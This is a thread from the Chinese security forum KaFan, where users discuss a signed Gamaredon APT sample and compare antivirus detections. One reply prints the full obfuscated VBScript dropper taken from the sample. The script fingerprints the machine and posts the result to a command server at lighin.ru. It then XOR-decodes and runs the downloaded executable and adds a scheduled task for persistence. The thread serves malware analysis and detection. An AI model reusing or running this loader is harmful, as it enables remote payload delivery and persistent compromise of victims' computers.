收藏本站 |切换到宽版 | 更换论坛皮肤
 找回密码  忘记邮箱  QQ快速登录  快速登录  快速注册

卡饭»论坛 安全区 病毒样本 分享&分析区 #Gamaredon #APT #Signed
12345下一页
返回列表 发新帖
楼主: hsks
 收起左侧

[病毒样本] #Gamaredon #APT #Signed

  [复制链接]
846472713
发表于 2021-7-9 19:48:03 | 显示全部楼层
cylance

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

正在缓冲
头像被屏蔽
发表于 2021-7-9 19:48:17 | 显示全部楼层
Shake2333 发表于 2021-7-9 19:21
McAfee miss,双击无法运行

9楼的VT中McAfee报了
回复

举报

ANY.LNK
发表于 2021-7-9 19:58:55 | 显示全部楼层
程序不是双击运行的,请使用mshta命令执行(此文件)
尾端嵌入了vbs脚本,前面也有几处修改
提取出的vbs脚本
  1.                 <html>
  2. <body>
  3. <script language="VBScript">
  4. On Error Resume Next
  5. if SKFGDCaWBDAoqQHbpnff < 11 then tnPyM = "OOzlQEPEhqxKjvYH"
  6. Set TjyjpMbVrYKdg = CreateObject("WS" & "cr" & "ip" & "t." & "Sh" & "el" & "l")
  7. if VgGVHa = 47 then bxewmQphqiGT = "kDtFTjIsRfUiiEqkljQbgqZSk"
  8. Set ngAnTVImteBoEho = CreateObject("Sc" & "ri" & "pt" & "in" & "g." & "Fi" & "le" & "Sy" & "st" & "em" & "Ob" & "je" & "ct")
  9. if bUxXmpBwTaRTNYVw = 20 then QxKapgnaexUMxv = "zkvpUYteCJdPRdibaevJiDloKwH"
  10. Set lAmnIxntyY = CreateObject("W" & "S" & "c" & "r" & "i" & "p" & "t" & "." & "N" & "e" & "t" & "w" & "o" & "r" & "k")
  11. if XQBxSozHoPuAUZDFC < 17 then EmmnGdoxBeGURoTah = "iEsDQU"
  12. MZkTAfMiw = Hex(ngAnTVImteBoEho.GetDrive(TjyjpMbVrYKdg.ExpandEnvironmentStrings("%S" & "YS" & "TE" & "MD" & "RI" & "VE" & "%")).SerialNumber)
  13. if WSTJwgHiLOAtyhxQeZ = "NofmqGwMjLvLYuq" then
  14. FiOApOKYCTsmqhlXRq = UCase("AHRevlHEOSbKMMJf")
  15. for LvZwYusBbMG = 36 to 275
  16. UrzalQAM = Trim("aXXemAWBQlIivgDiXmtKvxGxjKlbtfNwkNyYBPFBE")
  17. if WMJDthicaaQmdRaubPuIk = "GrtLCnWTbVHaVemKCFyBKWLCB" then
  18. LyhhegHgsGkGkk = UCase("thKBWhpTUXAwikpfFMXFmBFvhAljQk")
  19. if KhtoIazZlBJOJFXNLfQze = "mbdYXkTfMPyBMuFeefyZ" then isbOUVvFDksJmBrAWfMxUks = "ATWVLJknhayzk"
  20. end if
  21. Next
  22. end if
  23. CkaZbHTLxRSgwxKJmurCOt = TjyjpMbVrYKdg.ExpandEnvironmentStrings("%CO" & "MPU" & "TER" & "NAM" & "E%") & "_" & MZkTAfMiw
  24. if xihsXOPgaxzW = "lgAX" then
  25. fYYaOHevNVHFrwuS = UCase("nRTfgrrZJWbRAWlKlZlYkN")
  26. for gRVNYMTVHSlGGjanDnL = 90 to 209
  27. eZwXhsAHPzcargyOWeB = Trim("KileDByyUxBpIHV")
  28. if gLLGIqLOZkMQZmOgY = 13 then OmDoyJReeY = "rtYyUlrzCrZPdQmhuL"
  29. Next
  30. end if
  31. rWxIp = "num="+CkaZbHTLxRSgwxKJmurCOt+"&vr=hta"
  32. for TBQgvsJEgojkNdmL = 51 to 231
  33. EFTvsuXExU = Trim("ScsjafNZtLqKHBqAVhRiDVUGiaHtcxYhtDWHs")
  34. for HxnLud = 16 to 246
  35. lsgEcnJdYwIlBzYUxvn = Trim("fjHreKkPKZcwo")
  36. if YUlXPeZzG = "JmiIEKJHZaBkBYGkAPabGYuSHcGBPbjcYVVnQxXsZ" then
  37. DjdqPHVUiNxwlIz = UCase("RoFlSJGNvWiXmkrPBcEIsxrZLfDTTD")
  38. if ClHGNWKxuCgMuAjkvA = 24 then uoQdUwgZmFntsezVBdkCfRG = "QeeKwSXSHwtlImJgwXrGIoiufiH"
  39. end if
  40. Next
  41. Next
  42. DIcSCqKCCVIp = TjyjpMbVrYKdg.ExpandEnvironmentStrings("%PU" & "BL" & "IC%") + "\Do" & "wn" & "lo" & "ad" & "s\M" & "u" & "s" & "i" & "k.hta"
  43. if hYNkd = 12 then OHzOc = "hdZRKCtI"
  44. cSWDxPyCtzNMFZOFFG = TjyjpMbVrYKdg.ExpandEnvironmentStrings("%PU" & "BL" & "IC%") + "\Do" & "wn" & "lo" & "ad" & "s\M" & "u" & "s" & "i" & "k.ini"
  45. if EtytFGQRFvs = "tyAuJIhWibxLwVHRraXOSTZ" then
  46. jAzmOLtCLQx = UCase("TomTqLGovZAHGWHxOWjIDopsDbLksjGaZWaVVN")
  47. if UIPXVALUSaAwk = "hjwmbArMouYSXDQq" then ZfyuPPAWvMT = "SjKpIxvWbyQ"
  48. end if
  49. lbBJUBMA = TjyjpMbVrYKdg.ExpandEnvironmentStrings("%PU" & "BL" & "IC%") + "\Do" & "wn" & "lo" & "ad" & "s\M" & "u" & "s" & "i" & "k.exe"
  50. if pXRyxehmwlRtcIrTKuETsT < 14 then ZuQIevzvU = "zvTVlaktVDZMJJUaYfpq"
  51. for fcoejbREFiD = 81 to 257
  52. NcmXAYbjXMGCXC = Trim("WsVWYRxxfMYXDYBvavXwjzltrtSVlGhiwei")
  53. if BpLoZUMDLTnFGwGVY = 38 then XGcffybMYepbZpLOZGMHK = "pgZfQeJaNXnLiFVJMN"
  54. Next
  55. Set kdEdBOevrfbtM = GetObject("win" & "mgm" & "ts:" & "{im" & "per" & "son" & "ati" & "onL" & "eve" & "l=i" & "mpe" & "rso" & "nat" & "e}/" & "/" & lAmnIxntyY.ComputerName & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2").ExecQuery("SELECT * FROM Win32_PingStatus WHERE Address = 'lighin.ru'")
  56. if RjTEIXkLrKBa < 16 then ouceWwgLbqfsGrQANoQ = "FCSVwjVHJH"
  57. For Each YErAyWXXMEGKFtWyokgja In kdEdBOevrfbtM
  58. If YErAyWXXMEGKFtWyokgja.StatusCode = 0 Then
  59. DAPMal = "htt" & "p:/" & "/" + YErAyWXXMEGKFtWyokgja.ProtocolAddress + "/revers.php?id="
  60. End If
  61. Next
  62. if SiJOyd = "kfsvprXRDWJexDCnQPzEHQSifz" then
  63. uOXgvGQJeJtECwfkk = UCase("IIHnyYmOxnzYfJeCtAALqBPgPlgUTNKPqLOJwiLF")
  64. if EARrTvdOYifnpGtbYMsS = "kDVHQVKzMtuUXhJzAIINukmpJe" then
  65. kcjhUuUGLouAAxOPYRkrFo = UCase("AvIbpvAzeynEkBpiHFdrh")
  66. if jiwbizQfxlI = "NDX" then
  67. EERFYWie = UCase("FCfkgmeldYssTSzOSpTbr")
  68. if pzEUzkRWfZPdwkvR = "MSDpCdXXUxT" then eYafZNEEiQhXkvUUYpkbSfBM = "yPmAPQTj"
  69. end if
  70. end if
  71. end if
  72. if iTJxeAVsCBRhyFJQRSkw < 17 then fajZYxmOncjMQb = "pdRNkWdlBqekirWqIRCtaXG"
  73. CreateObject("S" & "h" & "e" & "l" & "l" & "." & "A" & "p" & "p" & "l" & "i" & "c" & "a" & "t" & "i" & "o" & "n").ShellExecute "SC" & "HT" & "AS" & "KS", "/CR" & "EAT" & "E /" & "sc " & "min" & "ute" & " /m" & "o 7 /tn ""S" & "y" & "s" & "t" & "e" & "m" & "D" & "a" & "t" & "a" & "P" & "r" & "o" & "v" & "i" & "d" & "e" & "r" & "s"" /tr " + DIcSCqKCCVIp + " /F","","",0
  74. if RXNeGGEDfJACP = "USoQiGywKRFDhCttsYSzQ" then gXZetvczYkf = "ZUeVenuSyczIllPOau"
  75. for xXvxaKCIYnkLLyJT = 8 to 279
  76. wrvcNStRMwpRYau = Trim("ukkPjRdpoaqh")
  77. if kxUPjBkFBfNN = "gIdyXeTbfcXhbFeUbRpjECVFnpbkizXDBGnHGCN" then
  78. qzNpHhwOi = UCase("hEilpJYHKnGeZzmenXLhDjsfFTfURXNZEPB")
  79. if kQdRTZvtseCU < 19 then UirfXyMC = "eDpnZgaKylLCH"
  80. end if
  81. Next
  82. Set AQtbgUKu = GetObject("winmgmts://" & "." & "/" & "r" & "o" & "o" & "t" & "/" & "c" & "i" & "m" & "v" & "2")
  83. if PorYMbkVwqaqOgYuOy = "VbbF" then
  84. rIVzLdSRiHUpyyVzkIL = UCase("nanbLJDPpVatogvtJBOcAcstgolCwPPgQPXCfqXxQaJcv")
  85. if bQILZMdjLiuuWXBTZFtdZIs < 11 then TeQLaSPxas = "nDqTmfMUlvAZPGjXCcW"
  86. end if
  87. For Each TzWsvMeUOvnpKbgQx In AQtbgUKu.ExecQuery("SE" & "LE" & "CT" & " N" & "am" & "e " & "FR" & "OM" & " W" & "in" & "32" & "_P" & "ro" & "ce" & "ss" & " W" & "HE" & "RE" & " N" & "am" & "e='M" & "u" & "s" & "i" & "k.exe'")
  88. TzWsvMeUOvnpKbgQx.Terminate
  89. Next
  90. if pJbAWIWBmLTBW < 12 then bXnwIewsWkTLsT = "qfSygLYoFNqyoBo"
  91. if UvsvnX = 40 then wSXrZiYhIuxnJcgzrsN = "ghMmbtSvoOcfEPCRrxIsR"
  92. oNLieMQRBwxVFJkylrChN = Int((10000 * Rnd) + 1)
  93. if nMqmOl = 43 then SfznKBnxASHmzTmfWPct = "JOBIVEtZyvTKW"
  94. If ngAnTVImteBoEho.FileExists(cSWDxPyCtzNMFZOFFG) Then ngAnTVImteBoEho.DeleteFile(cSWDxPyCtzNMFZOFFG)
  95. if pwLtqtKZbBxn = "FopoddbSdDYxwnvfsUsBqieGruaXnXPGYvIwNXcyh" then
  96. OkDMGbJcGSEBvTmlDmrP = UCase("dOgEzfrGKRyNCWJjxiC")
  97. if FoRYBeyRUruUhFPZ < 13 then vufhMxHKsmmeauvdfXa = "yAsoqZEtVRtJLmIYw"
  98. end if
  99. If ngAnTVImteBoEho.FileExists(lbBJUBMA) Then cAzqcAZTaAo = TjyjpMbVrYKdg.run (lbBJUBMA,0,true)
  100. for RepLmUCEEoIl = 73 to 260
  101. qavyODl = Trim("TZSeISAVDkOlRnuQzgAu")
  102. if cfNwWHihleuTVmUqu = "wsmWyjqxRIvIl" then
  103. ETEBsFIIEyEFnbtnwmQ = UCase("qxbbnHnNCjdfrTZiphZhoLgi")
  104. if PKqwCvTX < 17 then wLUzIYipDtSrWYjSOjE = "RtZesdXGghMTidWV"
  105. end if
  106. Next
  107. If ngAnTVImteBoEho.FileExists(lbBJUBMA) Then ngAnTVImteBoEho.DeleteFile(lbBJUBMA)
  108. if aWgaNUuzWulbcueGq = "anBaKormXDYLsPhFhpSALjWbqDnvcBEljwApt" then
  109. HiKzfdmSssvlL = UCase("wBeULHaUlXkmL")
  110. if LcqQakHAvJVz < 14 then cvOsMetQVqYOAWSPLpqy = "TKYTTpBiLqInrp"
  111. end if
  112. if GlvNj = "AFDynoWyurOAwkndchbFa" then fPDVOFVuM = "WnljnptMSTsZfQFoOR"
  113. for TJrdNeqGPUHHjeAlBLgp = 29 to 328
  114. JRirkSCWvPLNpUI = Trim("FZHpfYyyuuWWtpiNJ")
  115. if lcLojUFw = 21 then tJsVGDbQTUlJtmYHAYVVfc = "GJeukXUacEEkCA"
  116. Next
  117. jTIJzzAlwtn ()
  118. if TCIybjnDUzidTIekZbIaTfx = 16 then BfOoQZclfMmPfJcElngrEI = "pfHKoPcoEOwvUymvXxyG"
  119. If ngAnTVImteBoEho.FileExists(cSWDxPyCtzNMFZOFFG) Then
  120. vgPeCOds = TfUBrsmBeQpQzHR("" + MZkTAfMiw + "")
  121. bkQNIcHOu = fTQnMRvTK( "" + cSWDxPyCtzNMFZOFFG + "", "" + lbBJUBMA + "", vgPeCOds )
  122. End If
  123. if KzGZbrM = "TCfMljiZfZJZFMqnHL" then
  124. ZwqzYDWiyCdFAiWYEnD = UCase("IKBoyIOGcdiUnnuRXRdNpUxCZtEAoriQtuuHSOgEWcGvxFVmLuSWd")
  125. if oMyPED = 44 then SkuRbtsmyJ = "rMOBFTYSptZMmwqGvU"
  126. end if
  127. For Each TzWsvMeUOvnpKbgQx In AQtbgUKu.ExecQuery("SE" & "LE" & "CT" & " N" & "am" & "e " & "FR" & "OM" & " W" & "in" & "32" & "_P" & "ro" & "ce" & "ss" & " W" & "HE" & "RE" & " N" & "am" & "e='mshta.exe'")
  128. TzWsvMeUOvnpKbgQx.Terminate
  129. Next
  130. if ByYHhRydfVoh = "DFHDGMKAThhYrXRjfSxDULzZHzLBcHRLFJVBZ" then
  131. TEkNHctHw = UCase("rQUVUzcvMMvYwaKsUsGivHA")
  132. if LQWTiCQJRbhjyq < 11 then wMmyGDKqAMocvrSjPLxJjGbe = "OfzdJVCGmiVBCTAa"
  133. end if
  134. if cDPWYGGPXE = "gzn" then
  135. szjMSyDxJmB = UCase("mSJjckSeIWywjpipIKlVzlkcwjCcbDiXlgU")
  136. if UoIgEDvzGN = 42 then DLrWNRaAhhmt = "DFoaLDVmcoWdouhpcpWiYPLMKTF"
  137. end if
  138. for NFfJCMxunxXhem = 45 to 288
  139. KCBLPKIlPpBXzAUUEb = Trim("CtsznNrKptMnSLYjMMPEUQTAoxtSdSFFFFIIJL")
  140. for QaZwpkhpwksOJbIlarKpTYh = 41 to 230
  141. nGhMCQZAkRntr = Trim("PDWsaqwewXhSAm")
  142. for tCJiCUmfKrernPuDgGZQBo = 77 to 292
  143. wKDPfiHAyovApNcBvQrhjME = Trim("dluMNqEFMYzFHxDrgDsPFqDEezKHMkGNhCEVF")
  144. if EvjBDBpJtesgBxS = "hlubnTWpzCpqQcUDFPPf" then niphNgxtcSmXE = "nQENYxqYlPS"
  145. Next
  146. Next
  147. Next
  148. for IgKPln = 18 to 270
  149. FFlVCMoSwH = Trim("TvUWKfCfXDDXGahXyWTEdWLzxNieWrcwpglMMoFFkiiCiywmGuxkpVVwkU")
  150. for xXIfaGhaoULKROTuoJRzRvX = 49 to 245
  151. urGUKocsPIHMZCb = Trim("yljnTbBaIbCZfCAhljAMPzsSvJGGVl")
  152. if ivxmrGXfSkgBppcFMrRsa = "vFXuLrjFNqeLVue" then GytQsK = "rdFgAtdUoQep"
  153. Next
  154. Next
  155. for nOVBxEhRXoGQpJZR = 66 to 255
  156. mBYyysVOBkExrSIAJ = Trim("leOkWGCNqLMYTLtkEdpVAnvUdUfVxPgY")
  157. if wImocrqHXqXgegZXvfvzXy < 23 then tHCagQafnTZOlxQBxe = "ExwpzwZUAdF"
  158. Next
  159. Function jTIJzzAlwtn()
  160. if aAphZzBBbVxBQzePlibb = "rVPlLAJOvkuyJYavWoAJNmlYFemY" then
  161. brRHdcMASILPsuAdMojjfh = UCase("rsOtNalOrBAItPfxvqFmsNvfYQFjrfhNkUDsG{过}F{滤}WxohfnAATWGaKnhm")
  162. if xjVwUBWLTnYZLmQq < 11 then HxLiHeXxidRVtfxSZvxjzcm = "TMctKTJUsapq"
  163. end if
  164. On Error Resume Next
  165. if ypZBSeKlZU = "InT" then
  166. ovtluMuQAhQnCKdlvEHkFc = UCase("iINqRtDHjwvGZ")
  167. if OghBWrotPgSjpLul < 13 then bILImqztzCuozyidbOUalwMu = "KyKOvoLyfQvVbpiIXouEPik"
  168. end if
  169. Set bPwWH = CreateObject("MS" & "XM" & "L2" & ".X" & "ML" & "HT" & "TP")
  170. if WRjEElf = "smShDvyNrjEwtAWvy" then JsdPSwCexVKEorLiTMv = "wWWdNaIeQfFAksqAsXavLXxpmOQO"
  171. Set bTcEQqiA = CreateObject("ADO" & "DB." & "Str" & "eam")
  172. if KuUcKpQQdRqdzjXmtehwQDIQ = 43 then VvifpzcYZgdEBJSah = "DdzmeBguyuiGmEvothlnROFZCt"
  173. bPwWH.Open "POST", DAPMal + CStr(oNLieMQRBwxVFJkylrChN), False
  174. for klToYiYAmSqrRk = 45 to 289
  175. GdMkbjbBhlAqdmXx = Trim("ZSKVgvFqoZJOCnOpTKEvqIjmCYsvOOVSLVLLwHgoWtncXXxDOwEnTkFQ")
  176. if THDKbZErDhcCtL = "cXoYlMRNXgUQaLCtJELI" then PZxUHOeaogRJiyaP = "cJohOdJQWscRhaWWFdNfHjiKKOU"
  177. Next
  178. bPwWH.setRequestHeader "C" & "o" & "n" & "t" & "e" & "n" & "t" & "-" & "T" & "y" & "p" & "e", "ap" & "pl" & "ic" & "at" & "io" & "n/" & "x-" & "ww" & "w-" & "fo" & "rm" & "-u" & "rl" & "en" & "co" & "de" & "d"
  179. for HlVTXZNw = 1 to 317
  180. odpKLX = Trim("TGfLgLMfZLHdfwfYTWAtiEJNdHoVK")
  181. for sdzxYevFJ = 18 to 304
  182. sABpaIg = Trim("BzwlOwShYWrVBBOzgyHuXQqmqEHYDyILYfJtgNjbMNgmQXyAaach")
  183. if UkIKvKoteaOfwVrVTTPgh < 15 then kEVSGGxd = "JgLZkWRZmSjGXka"
  184. Next
  185. Next
  186. bPwWH.setRequestHeader "Con" & "ten" & "t-L" & "eng" & "th", Len(rWxIp)
  187. if LEfLbQCHdDuVTD < 10 then CiPIyOut = "CsubiCOddTnAVSspylK"
  188. bPwWH.Send rWxIp
  189. if IjfVcEbhujL < 20 then RCcbxtUgSqJvb = "xtbWnyv"
  190. If bPwWH.Status = 200 Then
  191. bTcEQqiA.Open
  192. bTcEQqiA.Type = 1
  193. bTcEQqiA.Position = 0
  194. bTcEQqiA.Write bPwWH.ResponseBody
  195. bTcEQqiA.SaveToFile cSWDxPyCtzNMFZOFFG
  196. bTcEQqiA.Close
  197. End If
  198. End Function
  199. if XVuAgvxBzUoraH = "BKJCTDJhEwwDmttTGtcceiJljbaVGugBWEzWlu" then
  200. XDSMSsWz = UCase("vKGneKHlJZsMytWLTBXSscobKQvghuXhLMgRXvebcq")
  201. if NhhIztgUNbpTWfcOPaDPCKA = "WNurSPMBnBtCguwtFIxSloIeSzgctOBzq" then
  202. MFoXXvqBLsNcimgoOCU = UCase("QzLwEIjoNKyKwnqnjFEByiFQYT")
  203. if HZztMPexiIDpiwaxfI = "ShtvXlZzhoKEygItEaC" then smGfvv = "TBHHkQQqxA"
  204. end if
  205. end if
  206. if aEpYoKnRBDenoWHiANY = 37 then mOARz = "UEjBlkhJhifxFVOkcadL"
  207. Function TfUBrsmBeQpQzHR( TjyjpMbVrYKdg )
  208. On Error Resume Next
  209. Dim vbUwYQgMnnOpvzKXfeJj, ByNLbsVc( )
  210. ReDim ByNLbsVc( Len( TjyjpMbVrYKdg ) - 1 )
  211. For vbUwYQgMnnOpvzKXfeJj = 0 To UBound( ByNLbsVc )
  212. ByNLbsVc(vbUwYQgMnnOpvzKXfeJj) = Asc( Mid( TjyjpMbVrYKdg, vbUwYQgMnnOpvzKXfeJj + 1, 1 ) )
  213. Next
  214. TfUBrsmBeQpQzHR = ByNLbsVc
  215. End Function
  216. for WQyALmgDqhxcKGlXDBSah = 33 to 204
  217. EQutcEOObggfCvi = Trim("[过滤]ZPxpOfvcWMxKvLhGRKbpbFRwfEpokzmErNfBw")
  218. if ZSmFUiVGjA < 11 then kVtAmTyBK = "GrXZtSiggJNvCWoAwNJx"
  219. Next
  220. if dsAHsrBtba = "SPNdcdFbARQSrP" then
  221. GaQiqpBhZTDAAQsngyw = UCase("hIUdgrJuuarArADUufMTrMmFN")
  222. if gHCkJkzLeLVPWIV = "WPQxRcmrpiProZJ" then DldObxwVmewZ = "PqKWtjUjVyjLhxe"
  223. end if
  224. for lmIRVymGpGaaaBGPJQcKe = 60 to 332
  225. hCZROXs = Trim("xGBreAATjqXFyKAowIHE")
  226. for LeFGrDkPOI = 17 to 273
  227. OdTAOlIP = Trim("jcDORZbkZrmjuWmYIwjUcPujhgohWyoPmYudCdmKneiSctYd")
  228. for zSZGLUhUg = 13 to 311
  229. kuNaCXxWcJVfKYgygc = Trim("LEKzVpfNZvixCatQHP")
  230. if BATrUIBZMnENrcYpDbhhRJC < 10 then niHynhZMBt = "lTeNoFAmr"
  231. Next
  232. Next
  233. Next
  234. Function fTQnMRvTK( gXUpDybxQDfD, PgPomDAtGBdLIEMVE, ByNLbsVc )
  235. On Error Resume Next
  236. Dim isEpnMuqtZZWqeuuPcMgeoRE, wiHlwSZ, gdPAWhrcKVrl, bbkXoy, AStbAirdmExG
  237. If Not IsArray( ByNLbsVc ) Then
  238. ByNLbsVc = Array( ByNLbsVc )
  239. End If
  240. For isEpnMuqtZZWqeuuPcMgeoRE = 0 _
  241. To UBound( ByNLbsVc )
  242. If Not IsNumeric( ByNLbsVc(isEpnMuqtZZWqeuuPcMgeoRE) ) Then
  243. fTQnMRvTK = 1032
  244. Exit Function
  245. End If
  246. If ByNLbsVc(isEpnMuqtZZWqeuuPcMgeoRE) < 0 _
  247. Or ByNLbsVc(isEpnMuqtZZWqeuuPcMgeoRE) > 255 Then
  248. fTQnMRvTK = 1031
  249. Exit Function
  250. End If
  251. Next
  252. Set wiHlwSZ = CreateObject("Sc" & "ri" & "pt" & "in" & "g." & "Fi" & "le" & "Sy" & "st" & "em" & "Ob" & "je" & "ct")
  253. If wiHlwSZ.FileExists( gXUpDybxQDfD ) Then
  254. Set gdPAWhrcKVrl = wiHlwSZ.GetFile( gXUpDybxQDfD )
  255. Set AStbAirdmExG = gdPAWhrcKVrl.OpenAsTextStream( 1, 0 )
  256. Else
  257. AStbAirdmExG.Close
  258. Set AStbAirdmExG=Nothing
  259. Set gdPAWhrcKVrl=Nothing
  260. Set wiHlwSZ=Nothing
  261. Exit Function
  262. End If
  263. If wiHlwSZ.FileExists( PgPomDAtGBdLIEMVE ) Then
  264. AStbAirdmExG.Close
  265. Set AStbAirdmExG=Nothing
  266. Set gdPAWhrcKVrl=Nothing
  267. Set wiHlwSZ=Nothing
  268. Exit Function
  269. Else
  270. Set bbkXoy = wiHlwSZ.CreateTextFile( PgPomDAtGBdLIEMVE, True, False )
  271. End If
  272. set isEpnMuqtZZWqeuuPcMgeoRE = 0
  273. Do Until AStbAirdmExG.AtEndOfStream
  274. For isEpnMuqtZZWqeuuPcMgeoRE = 0 _
  275. To UBound( ByNLbsVc )
  276. isEpnMuqtZZWqeuuPcMgeoRE + 1 mod ( UBound( ByNLbsVc ))
  277. bbkXoy.Write Chr( Asc( AStbAirdmExG.Read( 1 ) ) _
  278. Xor ByNLbsVc(isEpnMuqtZZWqeuuPcMgeoRE) )
  279. if AStbAirdmExG.AtEndOfStream Then Exit Do
  280. Next
  281. Loop
  282. set isEpnMuqtZZWqeuuPcMgeoRE = 0
  283. Do Until AStbAirdmExG.AtEndOfStream
  284. isEpnMuqtZZWqeuuPcMgeoRE = ( isEpnMuqtZZWqeuuPcMgeoRE + 1 ) \ ( UBound( ByNLbsVc ) + 1 )
  285. bbkXoy.Write Chr( Asc( AStbAirdmExG.Read( 1 ) ) _
  286. Xor ByNLbsVc(SioGH) )
  287. vbUwYQgMnnOpvzKXfeJj = vbUwYQgMnnOpvzKXfeJj + 1
  288. If SioGH < UBound( ByNLbsVc ) Then
  289. SioGH = SioGH + 1
  290. else SioGH = 0
  291. End If
  292. Loop
  293. bbkXoy.Close
  294. AStbAirdmExG.Close
  295. Set AStbAirdmExG=Nothing
  296. Set gdPAWhrcKVrl=Nothing
  297. Set bbkXoy=Nothing
  298. Set wiHlwSZ=Nothing
  299. End Function
  300. if MensyQSKyhmcWesVPeZc = 45 then mfyeVLkgIeXjoixuzfBss = "lVQvOJqqATzZzpNdEidqCOthvvaQy"
  301. if arbkCYPcEYpNGYOrds = "kicheHxHWeeypMVMxvALTSXmXBYLSiRwyFCP" then
  302. xVdwbYiFrqgWQBoqwvf = UCase("wSTbajNLigDfbtBuUTSKpJcjlpoMizkKGTAcgjtiKapUVfqoQBelk")
  303. if mpkqkv < 10 then diwtY = "YOkZjzPUHNFzzwgVyZBPO"
  304. end if
  305. if tbIjoRGVCuFQVDykkUsyDlKu < 25 then RhgsiuEhSVHdPcl = "asTfGtGoYCyIwH"
  306. if WNqQFEAXuFrSwD < 21 then OiCKsHQwz = "MxAZKJvKfUB"
  307. </script>
  308. </body>
  309. </html>
复制代码

评分

参与人数 1人气 +3 收起 理由
hsks + 3 感谢解答: )

查看全部评分

回复

举报

BE_HC
发表于 2021-7-9 20:03:00 | 显示全部楼层
hsks 发表于 2021-7-9 19:41
离谱

可能是我上报了?

我这里卫士还是不报
回复

举报

Shake2333
发表于 2021-7-9 20:04:27 | 显示全部楼层
正在缓冲 发表于 2021-7-9 19:48
9楼的VT中McAfee报了

我这还是不报
回复

举报

正在缓冲
头像被屏蔽
发表于 2021-7-9 20:06:21 | 显示全部楼层
Shake2333 发表于 2021-7-9 20:04
我这还是不报

更新病毒库?
看来McAfee和Microsoft Defender一样,报不报看程序心情
回复

举报

00006666
发表于 2021-7-9 20:19:28 | 显示全部楼层
BE_HC 发表于 2021-7-9 20:03
可能是我上报了?

我这里卫士还是不报

360 Total Security


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

anthonyqian
发表于 2021-7-9 20:32:18 | 显示全部楼层
本帖最后由 anthonyqian 于 2021-7-10 12:07 编辑

bd 不杀,vbs文件bd杀
现在exe也杀了
回复

举报

Shake2333
发表于 2021-7-9 20:49:51 | 显示全部楼层
正在缓冲 发表于 2021-7-9 20:06
更新病毒库?
看来McAfee和Microsoft Defender一样,报不报看程序心情

不报

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
回复

举报

心醉咖啡
发表于 2021-7-9 21:16:07 | 显示全部楼层
毒霸扫描miss
回复

举报

下一页 »
12345下一页
返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2025-5-5 19:07 , Processed in 0.099682 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表